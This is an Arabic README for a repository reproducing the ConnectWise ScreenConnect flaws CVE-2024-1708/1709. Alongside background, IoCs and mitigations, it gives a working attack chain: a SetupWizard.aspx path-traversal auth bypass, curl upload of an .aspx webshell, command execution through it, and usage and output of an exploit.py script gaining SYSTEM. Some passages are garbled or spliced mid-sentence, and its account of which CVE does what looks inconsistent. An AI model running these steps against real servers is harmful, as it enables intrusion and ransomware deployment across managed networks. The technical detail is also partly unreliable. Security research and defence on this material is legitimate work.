
إعادة إنتاج cve-2024-1708-connectwise_rce_reproduction
درجة CVSS: 8.4 (CVE-2024-1708) – 10.0 (CVE-2024-1709)
CWE: CWE-22 (اجتياز المسار)، CWE-288 (تجاوز المصادقة باستخدام مسار بديل)
البرنامج المتأثر: ConnectWise ScreenConnect (المعروف سابقًا باسم ScreenConnect) ≤ 23.9.7
تم الاكتشاف والإبلاغ: فبراير 2024
تم استغلالها في البرية: LockBit وBlack Basta وBl00dy ومجموعات أخرى تابعة لبرامج الفدية
CVE-2024-1708 وCVE-2024-1709 هما ثغرتان متسلسلتان في ConnectWise ScreenConnect (المعروف سابقًا باسم ConnectWise Control) تسمحان معًا لمهاجم بعيد غير مصادق بتحقيق تنفيذ كامل للتعليمات البرمجية عن بُعد على خادم ScreenConnect.
CVE-2024-1708 — تجاوز المصادقة عبر اجتياز المسار. لا يقوم معرّض النهاية SetupWizard.aspx (ومعرّضات الإعداد/الترقية ذات الصلة) بتعقيم تسلسلات اجتياز المسار المقدمة من المستخدم (../) بشكل صحيح. يمكن لمهاجم غير مصادق الاجتياز خارج دليل الإعداد المخصص والوصول إلى معرّضات نهاية تتطلب مصادقة. ولأن المعالج يعمل في سياق حساب SYSTEM (ويندوز) أو root (لينكس)، يرث المهاجم صلاحيات مرتفعة.
CVE-2024-1709 — رفع ملفات غير مقيد يؤدي إلى RCE. بمجرد تجاوز المصادقة، يمكن للمهاجم رفع ملف .aspx تعسفي أو أي ملف قابل للتنفيذ إلى جذر الويب. وبطلب الملف المرفوع بعد ذلك، يتم تنفيذ تعليمات برمجية تعسفية على الخادم.
تم استغلال هاتين الثغرتين على نطاق واسع ابتداءً من 19 فبراير 2024 من قبل مجموعات متعددة من برامج الفدية:
| مجموعة برامج الفدية | ملاحظات الحملة |
|---|---|
| LockBit | مسح واسع النطاق لنسخ ScreenConnect؛ استُخدم لنشر مشفّر LockBit في المراحل اللاحقة. |
| Black Basta | استغلت الوصول إلى مزودي الخدمات المُدارة (MSPs) للتنقل داخل شبكات العملاء المُدارين. |
| Bl00dy | حملات أصغر نطاقًا استهدفت خوادم ScreenConnect غير المحدثة. |
نظرًا لأن ScreenConnect يُنشر عادةً من قبل مزودي الخدمات المُدارة (MSPs) لإدارة مئات نقاط النهاية للعملاء عن بُعد، فإن اختراق خادم ScreenConnect واحد يمكّن من هجوم سلسلة التوريد — كل عميل لديه وكيل متصل بذلك الخادم يكون معرضًا للخطر.
يعرّض خادم ScreenConnect معالج إعداد عند:
/SetupWizard.aspx/
في حالات ترقية/إصلاح معينة، لا يفرض الخادم المصادقة لأنه يفترض أن معالج الإعداد هو تجربة التشغيل الأولى. الخلل الحرج يكمن في كيفية معالجة الخادم لملف تعريف الارتباط __Session أو ترويسات Transfer-Encoding / Content-Type عند الوصول إلى مسارات ضمن مساحة اسم المعالج.
بإرسال طلب إلى:
/SetupWizard.aspx/../../ScreenConnect/Login.aspx
يلغي اجتياز المسار سياق "معالج الإعداد"، بينما لا يزال الخادم يعتقد أن سياق الجلسة غير المصادق ينطبق. يتم إعادة توجيه المهاجم أو تقديم الصفحات له كما لو كان مصادقًا.
متجه بديل: معالجا PrepareUpgrade.aspx / PostUpgrade.aspx يفتقران بالمثل إلى فحوصات مصادقة ويعرّضان وظيفة رفع الملفات.
بمجرد وصول المهاجم إلى معرّض نهاية مصادق (أو الوصول مباشرة إلى معالج رفع الملفات في سياق الإعداد)، يمكنهم رفع ويب شيل .aspx خبيث:
POST /SetupWizard.aspx/../../ScreenConnect/UploadFile.aspx
Content-Type: multipart/form-data; boundary=----BOUNDARY
------BOUNDARY
Content-Disposition: form-data; name="file"; filename="shell.aspx"
Content-Type: application/octet-stream
<%@ Page Language="C#" %>...
------BOUNDARY--
يُكتب الملف إلى دليل تطبيق الويب (مثل C:\Program Files\ScreenConnect\Website\). طلب الشيل المرفوع يؤدي إلى تنفيذه بهوية الخادم.
SetupWizard.aspx بأن أي طلب ضمن مساره هو جزء من عملية الإعداد ويجب أن يتجاوز المصادقة — لكن اجتياز المسار يكسر هذا الافتراض.../ أو اجتياز الروابط الرمزية.| نطاق الإصدار | الحالة |
|---|---|
| 23.9.7 وما دون | معرضة للخطر |
| 23.9.8 | تم إصلاحها (صدر في 20 فبراير 2024) |
| 23.9.9 | تم إصلاحها |
| 23.9.10 (الأحدث) | تم إصلاحها |
ملاحظة: خوادم ScreenConnect المستضافة ذاتيًا (داخل المنشأة) هي الأهداف الأساسية. تم إصلاح نسخ ScreenConnect المستضافة لدى ConnectWise (السحابية) قبل الإفصاح العام ولم تكن معرضة للخطر أبدًا.
C:\Program Files\ScreenConnect\/opt/screenconnect/# Check the version
curl -s http://<target>:8040/ | Select-String "ScreenConnect"
أو قم بالوصول إلى الواجهة الإلكترونية ولاحظ رقم الإصدار في شفرة مصدر الصفحة.
curl -v --path-as-is "http://<target>:8040/SetupWizard.aspx/../../ScreenConnect/Login.aspx"
السلوك المتوقع على خادم معرض للخطر:
curl -X POST "http://<target>:8040/SetupWizard.aspx/../../ScreenConnect/UploadFile.aspx" \
-H "Content-Type: multipart/form-data; boundary=----BOUNDARY" \
-F "[email protected]"
curl "http://<target>:8040/shell.aspx?cmd=whoami"
يقوم السكربت المرفق exploit.py بأتمتة الخطوات المذكورة أعلاه:
usage: exploit.py [-h] -t TARGET [-p PORT] [-c COMMAND] [--ssl]
Exploit CVE-2024-1708/1709 - ConnectWise ScreenConnect Auth Bypass + RCE
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
Target hostname or IP
-p PORT, --port PORT Target port (default: 8040)
-c COMMAND, --command COMMAND
Command to execute (default: whoami)
--ssl Use HTTPS
Example:
python exploit.py -t 192.168.1.100 -p 8040 -c "whoami"
$ python exploit.py -t 192.168.1.100 -c "whoami"
[*] Target: 192.168.1.100:8040
[*] Using SSL: False
[*] Step 1: Testing path traversal for auth bypass...
[+] Target appears vulnerable! Server version: 23.9.7
[*] Step 2: Uploading webshell...
[+] Webshell uploaded to: http://192.168.1.100:8040/PoCsAccSwLgSdE.aspx
[*] Step 3: Executing command 'whoami'...
[+] Output:
nt authority\system
ابحث عن مؤشرات الاختراق (IoCs) التالية في سجلات خادم الويب:
GET /SetupWizard.aspx/../../ScreenConnect/
POST /SetupWizard.aspx/../../ScreenConnect/UploadFile.aspx
GET /*.aspx?cmd=
هذا المستودع مقدم لأغراض تعليمية وبحوث أمنية مصرح بها فقط. الاختبار غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن كتابي صريح لاختبارها غير قانوني. المؤلفون غير مسؤولين عن إساءة استخدام هذه المعلومات.
| الضابط | التنفيذ |
|---|
| قواعد WAF | حظر الطلبات التي تحتوي على ../ في مسار URL بعد /SetupWizard.aspx/ |
| تقسيم الشبكة | وضع ScreenConnect في شبكة إدارة معزولة (VLAN) مع تصفية صارمة لحركة الخروج |
| التحكم في الوصول | تقييد الوصول إلى واجهة الويب الخاصة بـ ScreenConnect على نطاقات IP موثوقة فقط |
| المراقبة | التنبيه على الطلبات الموجهة إلى /SetupWizard.aspx/ من مصادر خارجية، أو على إنشاء ملفات .aspx غير متوقعة في ScreenConnect\Website\ |
| MFA | على الرغم من أن MFA لن يوقف هذا (تجاوز المصادقة يحدث قبل تسجيل الدخول)، فرضه على جميع الحسابات الإدارية للدفاع المتعمق |
| المصدر | الرابط |
|---|
| NVD - CVE-2024-1708 | https://nvd.nist.gov/vuln/detail/CVE-2024-1708 |
| NVD - CVE-2024-1709 | https://nvd.nist.gov/vuln/detail/CVE-2024-1709 |
| النشرة الأمنية من ConnectWise | https://www.connectwise.com/company/trust/security-advisories |
| Huntress Labs - الإفصاح الأولي | https://www.huntress.com/blog/mass-exploitation-of-connectwise-screenconnect |
| الثغرات المعروفة المستغلة لدى CISA | https://www.cisa.gov/known-exploited-vulnerabilities |
| تقنية ATT&CK: الخدمات الخارجية عن بُعد (T1133) | https://attack.mitre.org/techniques/T1133/ |